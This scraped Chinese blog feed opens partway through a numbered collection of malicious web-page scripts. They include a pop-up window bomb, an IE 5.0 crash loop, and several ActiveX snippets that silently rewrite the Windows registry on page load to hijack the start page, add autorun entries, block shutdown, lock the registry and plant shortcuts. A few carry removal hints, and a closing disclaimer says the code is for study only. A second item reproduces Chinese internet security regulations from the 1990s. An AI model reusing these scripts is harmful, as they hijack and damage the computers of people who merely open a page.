<div>&lt;HTML&gt; <br />&lt;HEAD&gt; <br />&lt;TITLE&gt;f\*\*k USA&lt;/TITLE&gt; <br />&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=gb2312&quot;&gt; <br />&lt;/HEAD&gt; <br />&lt;BODY onload=&quot;WindowBomb()&quot;&gt; <br />&lt;SCRIPT LANGUAGE=&quot;javascript&quot;&gt; <br />function WindowBomb() <br />{ <br />var iCounter = 0 // dummy counter <br /><br />while (true) <br />{ <br />window.open(&quot;http://www.webjx.com&quot;,&quot;CRASHING&quot; + iCounter,&quot;width=1,height=1,resizable=no&quot;) <br />iCounter++ <br />} <br />} <br />&lt;/script&gt; <br />&lt;/BODY&gt; <br />&lt;/HTML&gt; </div>
<p><br /><br /><strong>　　4、造成IE 5.0崩溃的代码</strong> <br /><br /></p>
<div>&lt;HTML&gt; <br />&lt;BODY&gt; <br />&lt;script&gt; <br />var color = new Array; <br />color[1] = &quot;black&quot;; <br />color[2] = &quot;white&quot;; <br />for(x = 0; x &lt;3; x++) <br />{ <br />document.bgColor = color[x] <br />if(x == 2) <br />{ <br />x = 0; <br />} <br />} <br />&lt;/SCRIPT&gt; <br />&lt;/BODY&gt; <br />&lt;/HTML&gt; </div>
<p><br /><br />　　<strong>5、进入WINDOWS 之前弹出来的对话框代码 到注册表找到 LegalNoticeCaption ， LegalNoticeText 删除 <br /></strong><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br />function f(){ <br />try <br />{ <br />//ActiveX initialization <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Shl = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />FSO = a1.GetObject(); <br />a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Net = a1.GetObject(); <br />try <br />{ <br />if (documents .cookie.indexOf(&quot;Chg&quot;) == -1) <br />{ <br />Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption&quot;, &quot;这里是标题栏&nbsp;网页教学网 <a href="http://www.webjx.com/"><font color="#000000">www.webjx.com</font></a>&quot;); <br />Shl.RegWrite (&quot;HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption&quot;, &quot;这里是标题栏 网页教学网 <a href="http://www.webjx.com/"><font color="#000000">www.webjx.com</font></a>&quot;); <br />Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText&quot;, &quot;请多留意本站的文章 <a href="http://www.webjx.com/"><font color="#000000">www.webjx.com</font></a>&quot;); <br />Shl.RegWrite (&quot;HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText&quot;, &quot;请多留意本站的文章 <a href="http://www.webjx.com/"><font color="#000000">www.webjx.com</font></a>&quot;); <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br />} <br />} <br />catch(e) <br />{} <br />} <br />catch(e) <br />{} <br />} <br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>6、造成 WINDOWS98 不能关机的代码。 到注册表找到 FastReboot 删除就OK </strong><br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br /><br />function f(){ <br />try <br />{ <br />//ActiveX initialization <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Shl = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />FSO = a1.GetObject(); <br />a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Net = a1.GetObject(); <br /><br />try <br />{ <br />if (documents .cookie.indexOf(&quot;Chg&quot;) == -1) <br />{ <br />Shl.RegWrite (&quot;HKLM\\System\\CurrentControlSet\\Control\\Shutdown\\FastReboot&quot;, &quot;1&quot;); <br />Shl.RegWrite (&quot;HKCU\\System\\CurrentControlSet\\Control\\Shutdown\\FastReboot&quot;, &quot;1&quot;); <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br /><br />} <br />} <br />catch(e) <br />{} <br />} <br />catch(e) <br />{} <br />} <br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>7、让电脑自动启动程序的代码 。 修改方法 找到相应键值</strong><a href="http://www.webjx.com/" target="_blank"><u><strong><font color="#000000">http://www.webjx.com/</font></strong></u></a><strong>删除</strong> <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br /><br />function f(){ <br />try <br />{ <br />文件://ActiveX/ initialization <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Shl = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />FSO = a1.GetObject(); <br />a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Net = a1.GetObject(); <br /><br />try <br />{ <br />if (documents .cookie.indexOf(&quot;Chg&quot;) == -1) <br />{ <br />Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\&quot;, &quot;http://i50.yjpc.com/&quot;); <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br /><br />} <br />} <br />catch(e) <br />{} <br />} <br />catch(e) <br />{} <br />} <br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>8、自动设成主页代码</strong> <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br /><br />function f(){ <br />try <br />{ <br />//ActiveX initialization <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Shl = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />FSO = a1.GetObject(); <br />a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Net = a1.GetObject(); <br /><br />try <br />{ <br />if (documents .cookie.indexOf(&quot;Chg&quot;) == -1) <br />{ <br />Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page&quot;, &quot;http://i50.126.com/&quot;); <br />Shl.RegWrite (&quot;HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page&quot;, &quot;http://i50.126.com/&quot;); <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br /><br />} <br />} <br />catch(e) <br />{} <br />} <br />catch(e) <br />{} <br />} <br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>9、修改IE标题栏目。 修改方法 将以下代码中可以换的换成你想换的</strong> <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br /><br />function f(){ <br />try <br />{ <br />//ActiveX initialization <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Shl = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />FSO = a1.GetObject(); <br />a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Net = a1.GetObject(); <br /><br />try <br />{ <br />if (documents .cookie.indexOf(&quot;Chg&quot;) == -1) <br />{ <br />Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title&quot;, &quot;&mdash;&mdash;&mdash;&mdash;（　ＷＷＷ。ＷＥＢＪＸ.ＣＯＭ　）&mdash;&mdash;&mdash;&mdash;（　网页教学网恶意代码请勿试用　）&mdash;&mdash;&mdash;&mdash;（ ＷＷＷ。ＷＥＢＪＸ.ＣＯＭ）&quot;); <br />Shl.RegWrite (&quot;HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title&quot;, &quot;&mdash;&mdash;&mdash;&mdash;（　ＷＷＷ。ＷＥＢＪＸ.ＣＯＭ　）&mdash;&mdash;&mdash;&mdash;（　网页教学网恶意代码请勿试用　）&mdash;&mdash;&mdash;&mdash;（ ＷＷＷ。ＷＥＢＪＸ.ＣＯＭ）&quot;); <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br /><br />} <br />} <br />catch(e) <br />{} <br />} <br />catch(e) <br />{} <br />} <br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>10、在右键加进网页链接 。修改方法：到注册表找到 MenuExt 把它删除就OK</strong> <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br />function f() <br />{ <br />try <br />{ <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />sh = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />fo = a1.GetObject(); <br />if (documents .cookie.indexOf(&quot;km169set&quot;) == -1) <br />{ <br />sh.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\网页教学网\\&quot;, &quot;c:\\yntop.htm&quot;); <br />sh.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\网页教学网<a href="file://contexts/"><font color="#000000">\\contexts</font></a>&quot;, 0xf3,&quot;REG_DWORD&quot;); <br />hd=fo.CreateTextFile(&quot;c:\\yntop.htm&quot;); <br />hd.write(&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;\script language=java script&gt;window.open(&quot;http://www.webjx.com&quot;);&lt;\/script&gt;&lt;/html&gt;); <br />hd.close(); <br />file=fo.GetFile(&quot;c:\\yntop.htm&quot;); <br />file.Attributes=6; <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;km169set=km169; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br />} <br />} <br />catch(e) <br />{ <br />} <br />} <br /><br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>11、IE 的 INTERNET 选项的主页条失去作用变灰的代码。 修改方法，找到 HomePage 删除就OK</strong><br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br />function f() <br />{ <br />try <br />{ <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />sh = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />fo = a1.GetObject(); <br />if (documents .cookie.indexOf(&quot;km169set&quot;) == -1) <br />{ <br />sh.RegWrite (&quot;HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage&quot;, 1,&quot;REG_DWORD&quot;); <br />hd=fo.CreateTextFile(); <br />hd.write(); <br />hd.close(); <br />file=fo.GetFile(&quot;c:\\yntop.htm&quot;); <br />file.Attributes=6; <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;webjx set=webjx; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br />} <br />} <br />catch(e) <br />{ <br />} <br />} <br /><br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>12、回收站给改了名字的修改方法：打开注册表找到 {645FF040-5081-101B-9F08-00AA002F954E} 修改就 OK <br /></strong><br />修改回收站的代码 <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt; <br />document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br /><br />function f(){ <br />try <br />{ <br />//ActiveX initialization <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Shl = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />FSO = a1.GetObject(); <br />a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Net = a1.GetObject(); <br /><br />try <br />{ <br />if (documents .cookie.indexOf(&quot;Chg&quot;) == -1) <br />{ <br />Shl.RegWrite (&quot;HKCU\\Software\\CLASSES\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\&quot;, &quot;回收站&quot;); <br />Shl.RegWrite (&quot;HKLM\\Software\\CLASSES\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\&quot;, &quot;回收站&quot;); <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;Chg=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br /><br />} <br />} <br />catch(e) <br />{} <br />} <br />catch(e) <br />{} <br />} <br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>13、注册表给锁住了，锁注册表的代码。</strong> <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;); <br />function f() <br />{ <br />try <br />{ <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />sh = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />fo = a1.GetObject(); <br />if (documents .cookie.indexOf(&quot;km169set&quot;) == -1) <br />{ <br />sh.RegWrite (&quot;HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools&quot;, 1,&quot;REG_DWORD&quot;); <br />hd=fo.CreateTextFile(); <br />hd.write(); <br />hd.close(); <br />file=fo.GetFile(&quot;c:\\yntop.htm&quot;); <br />file.Attributes=6; <br />var expdate = new Date((new Date()).getTime() + (1)); <br />documents .cookie=&quot;webjxset=webjx; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br />} <br />} <br />catch(e) <br />{ <br />} <br />} <br /><br />function init() <br />{ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>14、在收藏夹生成文件的代码，将以下代码加进网页后，只要别人一打开就可以自动加进收藏夹</strong> <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt;document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;);function yuzi(){try{hzy=document.applets[0];hzy.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;);hzy.createInstance();yuzi=hzy.GetObject();hzy.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;);hzy.createInstance();try{Shor=yuzi.CreateShortcut(hzy.GetObject().GetSpecialFolder(0)+&quot;\\Favorites&quot;+&quot;\\&quot;+&quot;【★-网页教学网-★】&quot;+&quot;.URL&quot;);Shor.TargetPath=&quot;http://www.webjx.com&quot;;Shor.Save();}catch(yu){]catch(yu){]setTimeout(&quot;yuzi()&quot;,1000);&lt;/SCRIPT&gt; </div>
<p><br /><br />　　<strong>15、在桌面生成的网页文件<br /></strong><br />以下代码就是在桌面上生成一份网页的文件，一按打开的就是你的网页 <br /><br /></p>
<div>&lt;SCRIPT language=java script&gt; <br />document.write(&quot;&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;&quot;) <br /><br />function AddFavLnk(loc, DispName, SiteURL) <br />{ <br />var Shor = Shl.CreateShortcut(loc + &quot;\\&quot; + DispName +&quot;.URL&quot;); <br />Shor.TargetPath = SiteURL; <br />Shor.Save(); <br />} <br /><br />function f(){ <br />try <br />{ <br />a1=document.applets[0]; <br />a1.setCLSID(&quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Shl = a1.GetObject(); <br />a1.setCLSID(&quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&quot;); <br />a1.createInstance(); <br />FSO = a1.GetObject(); <br />a1.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;); <br />a1.createInstance(); <br />Net = a1.GetObject(); <br /><br />try{ <br />//if (documents .cookie.indexOf(&quot;ChgLive&quot;) == -1) <br />//{ <br /><br />var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90)); <br />documents .cookie=&quot;ChgLive=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br />Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title&quot;, &quot;Internet Explorer&quot;); <br />var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90)); <br />documents .cookie=&quot;ChgLive=general; expires=&quot; + expdate.toGMTString() + &quot;; path=/;&quot; <br />var WF, Shor, loc; <br />WF = FSO.GetSpecialFolder(0); <br />loc = WF + &quot;\\Favorites&quot;; <br />if(!FSO.FolderExists(loc)) { <br />loc = FSO.GetDriveName(WF) + &quot;\\Documents and Settings\\&quot; + Net.UserName + &quot;\\Favorites&quot;; <br />if(!FSO.FolderExists(loc)) { <br />return; <br />} <br />} <br />AddFavLnk(&quot;C:\\WINDOWS\\Desktop&quot;, &quot;网页教学网&quot;, &quot;http://www.webjx.com&quot;); <br />//} <br />} <br /><br />catch(e){ } <br />} <br />catch(e){ } <br />} <br /><br />function init(){ <br />setTimeout(&quot;f()&quot;, 1000); <br />} <br />init();&lt;/SCRIPT&gt; </div>
<p></p>
<p>　　<strong><font color="#dc143c">以上代码仅供学习研究使用，请勿使用害人，造成损失本人概不负责，谢谢合作！</font></strong></p>]]></description>
		</item>
		    
		
		<item>
			<title>计算机信息网络国际联网安全保护管理办法 </title>
			<link>http://caipei06.blog.sohu.com/43431963.html</link>
			<comments>http://caipei06.blog.sohu.com/43431963.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Mon, 28 Apr 2008 12:35:39 +0800</pubDate>
			<guid>http://caipei06.blog.sohu.com/43431963.html</guid>
			<description><![CDATA[
<div align="center">计算机信息网络国际联网安全保护管理办法 </div>
<p align="center">（1997年12月11日国务院批准1997年12月30日公安部发布）</p>
<p><span>第一章　总　则 <br /></span><span>...............................................................................................................</span></p>
<p>　　第一条　为了加强对计算机信息网络国际联网的安全保护，维护公共秩序和社会稳定，根据《中华人民共和国计算机信息系统安全保护条例》、《中华人民共和国计算机信息网络国际联网管理暂行规定》和其他法律、行政法规的规定，制定本办法。</p>
<p>　　第二条　中华人民共和国境内的计算机信息网络国际联网安全保护管理，适用本办法。</p>
<p>　　第三条　公安部计算机管理监察机构负责计算机信息网络国际联网的安全保护管理工作。<br />　　 公安机关计算机管理监察机构应当保护计算机信息网络国际联网的公共安全，维护从事国际联网业务的单位和个人的合法权益和公众利益。</p>
<p>　　第四条　任何单位和个人不得利用国际联网危害国家安全、泄露国家秘密，不得侵犯国家的、社会的、集体的利益和公民的合法权益，不得从事违法犯罪活动。</p>
<p>　　第五条　任何单位和个人不得利用国际联网制作、复制、查阅和传播下列信息：<br />　　 （一）煽动抗拒、破坏宪法和法律、行政法规实施的；<br />　　 （二）煽动颠覆国家政权，推翻社会主义制度的；<br />　　 （三）煽动分裂国家、破坏国家统一的；<br />　　 （四）煽动民族仇恨、民族歧视，破坏民族团结的；<br />　　 （五）捏造或者歪曲事实，散布谣言，扰乱社会秩序的；<br />　　 （六）宣扬封建迷信、淫秽、色情、赌博、暴力、凶杀、恐怖，教唆犯罪的；<br />　　 （七）公然侮辱他人或者捏造事实诽谤他人的；<br />　　 （八）损害国家机关信誉的；<br />　　 （九）其他违反宪法和法律、行政法规的。</p>
<p>　　第六条　任何单位和个人不得从事下列危害计算机信息网络安全的活动：<br />　　 （一）未经允许，进入计算机信息网络或者使用计算机信息网络资源的；<br />　　 （二）未经允许，对计算机信息网络功能进行删除、修改或者增加的；<br />　　 （三）未经允许，对计算机信息网络中存储、处理或者传输的数据和应用程序进行删除、修改或者增加的；<br />　　 （四）故意制作、传播计算机病毒等破坏性程序的；<br />　　 （五）其它危害计算机信息网络安全的。</p>
<p>　　第七条　用户的通信自由和通信秘密受法律保护。任何单位和个人不得违反法律规定，利用国际联网侵犯用户的通信自由和通信秘密。<br /><br /></p>
<p><strong>第二章　安全保护责任</strong><br />...............................................................................................................<br />　第八条　从事国际联网业务的单位和个人应当接受公安机关的安全监督、检查和指导，如实向公安机关提供有关安全保护的信息、资料及数据文件，协助公安机关查处通过国际联网的计算机信息网络的违法犯罪行为。</p>
<p>　　第九条　国际出口信道提供单位、互联单位的主管部门或者主管单位，应当依照法律和国家有关规定负责国际出入口信道、所属互联网络的安全保护管理工作。</p>
<p>　　第十条　互联单位、接入单位及使用计算机信息网络国际联网的法人和其他组织应当履行下列安全保护职责：<br />　　 （一）负责本网络的安全保护管理工作，建立健全安全保护管理制度；<br />　　 （二）落实安全保护技术措施，保障本网络的运行安全和信息安全；<br />　　 （三）负责对本网络用户的安全教育和培训；<br />　　 （四）对委托发布信息的单位和个人进行登记，并对所提供的信息内容按照本办法第五条进行审核；<br />　　 （五）建立计算机信息网络电子公告系统的用户登记和信息管理制度；<br />　　 （六）发现有本办法第四条、第五条、第六条、第七条所列情形之一的，应当保留有关原始记录，并在二十四小时内向当地公安机关报告；<br />　　 （七）按照国家有关规定，删除本网络中含有本办法第五条内容的地址、目录或者关闭服务器。</p>
<p>　　第十一条　用户在接入单位办理入网手续时，应当填写用户备案表。备案表由公安部监制。</p>
<p>　　第十二条　互联单位、接入单位、使用计算机信息网络国际联网的法人和其他组织（包括跨省、自治区、直辖市联网的单位和所属的分支机构），应当自网络正式联通之日起三十日内，到所在地的省、自治区、直辖市人民政府公安机关指定的受理机关办理备案手续。<br />　　 前款所列单位应当负责将接入本网络的接入单位和用户情况报当地公安机关备案，并及时报告本网络中接入单位和用户的变更情况。</p>
<p>　　第十三条　使用公用帐号的注册者应当加强对公用帐号的管理，建立帐号使用登记制度。用户帐号不得转借、转让</p>
<p>　　第十四条　涉及国家事务、经济建设、国防建设、尖端科学技术等重要领域的单位办理备案手续时，应当出具其行政主管部门的审批证明。<br />　　 前款所列单位的计算机信息网络与国际联网，应当采取相应安全保护措施。<br /><br /></p>
<p><strong>第三章　安全监督</strong><br />...............................................................................................................</p>
<p>　　第十五条　省、自治区、直辖市公安厅（局），地（市）、县（市）公安局，应当有相应机构负责国际联网的安全保护管理工作。</p>
<p>　　第十六条　公安机关计算机管理监察机构应当掌握互联单位、接入单位和用户的备案情况，建立备案档案，进行备案统计，并按照国家有关规定逐级上报。</p>
<p>　　第十七条　公安机关计算机管理监察机构应当督促互联单位、接入单位及有关用户建立健全安全保护管理制度，监督、检查网络安全保护管理以及技术措施的落实情况。<br />　　 公安机关计算机管理监察机构在组织安全检查时，有关单位应当派人参加。公安机关计算机管理监察机构对安全检查发现的问题，应当提出改进意见，做出详细记录，存档备查。</p>
<p>　　第十八条　公安机关计算机管理监察机构发现含有本办法第五条所列内容的地址、目录或者服务器时，应当通知有关单位关闭或者删除。</p>
<p>　　第十九条　公安机关计算机管理监察机构应当负责追踪和查处通过计算机信息网络的违法行为和针对计算机信息网络的犯罪案件，对违反本办法第四条、第七条规定的违法犯罪行为，应当按照国家有关规定移送有关部门或者司法机关处理。<br /><br /></p>
<p><strong>第四章　法律责任</strong><br />...............................................................................................................</p>
<p>　　第二十条　违反法律、行政法规，有本办法第五条、第六条所列行为之一的，由公安机关给予警告，有违法所得的，没收违法所得，对个人可以并处五千元以下的罚款，对单位可以并处一万五千元以下的罚款；情节严重的，并可以给予六个月以内停止联网、停机整顿的处罚，必要时可以建议原发证、审批机构吊销经营许可证或者取消联网资格；构成违反治安管理行为的，依照治安管理处罚条例的规定处罚；构成犯罪的，依法追究刑事责任。</p>
<p>　　第二十一条　有下列行为之一的，由公安机关责令限期改正，给予警告，有违法所得的，没收违法所得；在规定的限制内未改正，对单位的主管负责人员和其他直接责任人员可以并处五千元以下的罚款，对单位可以并处一万五千元以下的罚款；情节严重的，并可以给予六个月以内的停止联网、停机整顿的处罚，必要时可以建议原发证、审批机构吊销经营许可证或者取消联网资格。<br />　　 （一）未建立安全保护管理制度的；<br />　　 （二）未采取安全技术保护措施的；<br />　　 （三）未对网络用户进行安全教育和培训的；<br />　　 （四）未提供安全保护管理所需信息、资料及数据文件，或者所提供内容不真实的；<br />　　 （五）对委托其发布的信息内容未进行审核或者对委托单位和个人未进行登记的；<br />　　 （六）未建立电子公告系统的用户登记和信息管理制度的；<br />　　 （七）未按照国家有关规定，删除网络地址、目录或者关闭服务器的；<br />　　 （八）未建立公用帐号使用登记制度的；<br />　　 （九）转借、转让用户帐号的。</p>
<p>　　第二十二条　违反本办法第四条、第七条规定的，依照有关法律、法规予以处罚。</p>
<p>　　第二十三条　违反本办法第十一条、第十二条规定，不履行备案职责的，由公安机关给予警告或者停机整顿不超过六个月的处罚。<br /><br /></p>
<p><strong>第五章　附则</strong><br />...............................................................................................................</p>
<p>　　第二十四条　与香港特别行政区和台湾、澳门地区联网的计算机信息网络的安全保护管理，参照本办法执行。</p>
<p>　　第二十五条　本办法自发布之日起施行。<br /></p>
<p>&nbsp;</p>
<p align="center">中华人民共和国计算机信息系统安全保护条例</p>
<p align="center">（1994年2月18日中华人民共和国国务院令147号发布）</p>
<p><strong>第一章　总　则<br /></strong>...............................................................................................................</p>
<p>　　第一条　为了保护计算机信息系统的安全，促进计算机的应用和发展，保障社会主义现代化建设的顺利进行，制定本条例。</p>
<p>　　第二条　本条例所称的计算机信息系统，是指由计算机及其相关的和配套的设备、设施（含网络）构成的，按照一定的应用目标和规则对信息进行采集、加工、存储、传输、检索等处理的人机系统。</p>
<p>　　第三条　 计算机信息系统的安全保护，应当保障计算机及其相关的和配套的设备、设施（含网络）的安全，运行环境的安全，保障信息的安全，保障计算机功能的正常发挥，以维护计算机信息系统的安全运行。</p>
<p>　　第四条　计算机信息系统的安全保护工作，重点维护国家事务、经济建设、国防建设、尖端科学技术等重要领域的计算机信息系统的安全。</p>
<p>　　第五条　中华人民共和国境内的计算机信息系统的安全保护，适用本条例。<br />　　 未联网的微型计算机的安全保护办法，另行制定。</p>
<p>　　第六条　公安部主管全国计算机信息系统安全保护工作。<br />　　 国家安全部、国家保密局和国务院其他有关部门，在国务院规定的职责范围内做好计算机信息系统安全保护的有关工作。</p>
<p>　　第七条　任何组织或者个人，不得利用计算机信息系统从事危害国家利益、集体利益和公民合法利益的活动，不得危害计算机信息系统的安全。<br /><br /></p>
<p><strong>第二章　安全保护制度<br /></strong>...............................................................................................................</p>
<p>　　第八条　计算机信息系统的建设和应用，应当遵守法律、行政法规和国家其他有关规定。</p>
